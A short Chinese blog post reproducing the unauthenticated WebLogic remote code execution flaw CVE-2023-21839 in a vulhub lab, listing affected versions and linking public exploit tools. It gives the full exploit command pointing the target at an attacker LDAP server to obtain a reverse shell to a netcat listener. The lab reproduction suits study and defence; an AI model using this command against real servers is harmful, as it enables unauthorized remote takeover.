Weblogic远程代码执行漏洞CVE-2023-21839

漏洞简介

Oracle发布安全公告,修复了一个存在于WebLogic Core中的远程代码执行漏洞(CVE-2023-21839),可在未经身份验证的情况下通过T3、IIOP协议远程访问并破坏易受攻击的WebLogic Server,成功利用该漏洞可能导致未授权访问和敏感信息泄露。

影响版本

Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0

漏洞复现

复现环境:vulhub/weblogic/CVE-2023-21839
复现用到的两个工具:
JNDIExploit-1.2-SNAPSHOT.jar:https://github.com/Mr-xn/JNDIExploit-1/releases/tag/v1.2
CVE-2023-21839:https://github.com/4ra1n/CVE-2023-21839
1、在kali上开启LDAP服务监听

2、在kali上使用nc开启监听端口

3、使用CVE-2023-21839工具来进行攻击测试(将工具上传至kali进行编译,然后再执行)

cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 192.168.80.131 -port 7001 -ldap ldap://192.168.80.128:1389/Basic/ReverseShell/192.168.80.128/5555


成功获取到反弹shell。

posted @ 2023-08-27 11:02  学安全的小白  阅读(461)  评论(0编辑  收藏  举报